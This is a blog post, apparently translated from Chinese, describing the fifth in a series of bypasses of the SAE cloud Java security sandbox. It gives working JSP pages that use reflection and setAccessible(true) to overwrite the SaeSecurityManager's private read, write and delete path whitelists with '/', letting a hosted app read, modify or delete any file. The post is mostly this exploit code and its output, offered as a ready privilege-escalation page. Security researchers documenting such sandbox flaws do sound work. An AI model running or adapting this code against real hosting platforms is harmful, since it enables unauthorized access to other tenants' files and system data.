{"id":451,"date":"2012-08-20T22:13:37","date_gmt":"2012-08-20T14:13:37","guid":{"rendered":"http:\/\/inbreak.net\/?p=451"},"modified":"2012-08-20T22:13:37","modified_gmt":"2012-08-20T14:13:37","slug":"sae%e4%ba%91%e6%9c%8d%e5%8a%a1%e5%ae%89%e5%85%a8%e6%b2%99%e7%ae%b1%e7%bb%95%e8%bf%875%e5%bc%ba%e5%88%b6%e4%bf%ae%e6%94%b9class%e7%a7%81%e6%9c%89%e6%9d%83%e9%99%90","status":"publish","type":"post","link":"https:\/\/www.inbreak.net\/archives\/451.html","title":{"rendered":"SAE Cloud Service Security Sandbox Bypass 5 (Forcibly Modifying Private Class Fields)"},"content":{"rendered":"
By 空虚浪子心 http://inbreak.net

Abstract

In the article "SAE Cloud Service Security Sandbox Bypass 4 (Bypassing the File Permission Defence)" http://inbreak.net/archives/436, the author mentioned an important class that SAE uses for its security checks: "com.sina.sae.security.SaeSecurityManager". This class provides several verification methods, and this bypass once again targets it.

Body

The previous article already noted that for this class to serve as the base class of the sandbox's security checks, it must extend java.lang.SecurityManager, and that from the current runtime one can look up the current SecurityManager object together with its concrete class name. Calling the static method getSecurityManager() of the System class returns that security manager, provided the Java program was started with the -Djava.security.manager command-line option selecting either the default security manager or a custom one.

Probing the sandbox environment

<pre>
<%=System.getSecurityManager()%>
</pre>

From the information the page returns, we can see the address and class name of this object; it is indeed the class that raises the sandbox security errors we have been seeing. So we can write some code to inspect the class's fields.

Let's look at what fields this class has:

<pre>
<%@page import="java.io.*,java.net.*,java.lang.reflect.*"%>
<%=System.getSecurityManager() %>
<%
 ClassLoader cl = Thread.currentThread().getContextClassLoader();
 try {
 // load the sandbox's security manager class by name
 Class c = cl.loadClass("com.sina.sae.security.SaeSecurityManager");
 %><%=c.toString()%><%
 // getDeclaredFields() returns every field declared on the class, private ones included
 Field[] f=c.getDeclaredFields();
 %><%="----------------------------------"%>
<%
 for(int i=0;i<f.length;i++){
 // the print expression was lost in extraction; reconstructed from the "type|name" output shown later on the page
 %><%=f[i].getType()+"|"+f[i].getName()%><%
 }
 } catch (Exception e) {
 %><%=e%><%
 }
%>
</pre>

This code enumerates all fields of an object, private and public alike.

Opening the page shows the result. We see the following field list:

<pre>
String[] rwPath
String[] readPath
String[] deletePath
BAN_LIST_STARTSWITH
BAN_LIST_FULLNAME
</pre>

Translating the English names of these fields gives away their purpose.

String[] rwPath: a list of paths, probably the paths where file writes are allowed; if the guess is right, most likely the path of my web directory.

String[] readPath: a list of paths, probably the paths where file reads are allowed; if the guess is right, most likely the path of my web directory.

String[] deletePath: a list of paths, probably the paths where file deletes are allowed; if the guess is right, most likely the path of my web directory.

These fields are enough to explain the problem: SAE's code must decide file read/write permissions based on these three paths.

Privilege escalation

Can these fields be changed? If they were public, they could simply be overwritten directly.

Let's write code that tries to modify these paths:

<pre>
<%@page import="java.io.*,java.net.*,java.lang.reflect.*"%>
<%
 SecurityManager security = System.getSecurityManager();
 try {
 // use the class of the live SecurityManager instance rather than loading it by name
 Class c = System.getSecurityManager().getClass();
 %><%=c.toString()%><%
 Field[] f=c.getDeclaredFields();
 for(int i=0;i<f.length;i++){
 // print expression reconstructed from the "type|name" output shown on the page
 %><%=f[i].getType()+"|"+f[i].getName()%><%
 try{ 
 // attempt to overwrite each field with a one-element whitelist "/"
 f[i].set(System.getSecurityManager(),new String[]{"/"});
 }catch (Exception e) {
 %><%=e%><%
 }
 }
 %><%="----------------------------------"%>
<%
 for(int i=0;i<f.length;i++){
 %><%=f[i].getType()+"|"+f[i].getName()%><%
 }
 } catch (Exception e) {
 %><%=e%><%
 }
%>
<%=security.toString()%>
</pre>

The page displayed an error; the important part is copied out here:

<pre>
java.lang.IllegalAccessException: Class org.apache.jsp.sm_jsp can not access a member of class com.sina.sae.security.SaeSecurityManager with modifiers "private"class [Ljava.lang.String;|readPath
</pre>

This error means the "private" field cannot be accessed, so the field cannot be modified directly. But this is not a dead end: if the current sandbox permissions happen to allow "suppressAccessChecks", then

<pre>
setAccessible(true)
</pre>

can be used to forcibly modify a class's private fields. Conveniently, SAE does grant this permission: in the first bypass I listed part of the permission list, and this permission was among them.

So a small change to the code is enough to forcibly modify these fields:

<pre>
<%@page import="java.io.*,java.net.*,java.lang.reflect.*"%>
<%
 SecurityManager security = System.getSecurityManager();
 //ClassLoader cl = Thread.currentThread().getContextClassLoader();
 try {
 Class c = System.getSecurityManager().getClass();
 %><%=c.toString()%><%
 
 Field[] f=c.getDeclaredFields();
 
 for(int i=0;i<f.length;i++){
 // print expression reconstructed from the "type|name" output shown on the page
 %><%=f[i].getType()+"|"+f[i].getName()%><%
 try{ 
 // the one change from the previous page: suppress the access check before writing the private field
 f[i].setAccessible(true);
 f[i].set(System.getSecurityManager(),new String[]{"/"});
 }catch (Exception e) {
 %><%=e%><%
 }
 }
 %><%="----------------------------------"%>
<%
 for(int i=0;i<f.length;i++){
 %><%=f[i].getType()+"|"+f[i].getName()%><%
 }
 } catch (Exception e) {
 %><%=e%><%
 }
 
%>
<%=security.toString()%>
</pre>

Now the fields can be changed. This page is the so-called privilege escalation page: once it has been visited, the current app's permissions are raised and it is allowed to access all files.

Before doing that, let's first see what reading a file looks like without the escalation: the file cannot be read.

Next, open the privilege escalation JSP file. This time it no longer returns the error saying the field is private and cannot be modified. As for the subsequent "Can not set static final java.util.Set field", that is because the type of the "BAN_LIST_STARTSWITH" field is not a String array; we were not going to modify that field anyway, so it does not matter. What matters is that the three whitelists of files the current app may read, write and delete have been changed to "/", which means any file can be read, deleted or modified.

Now visit the file-reading address once more to see the result.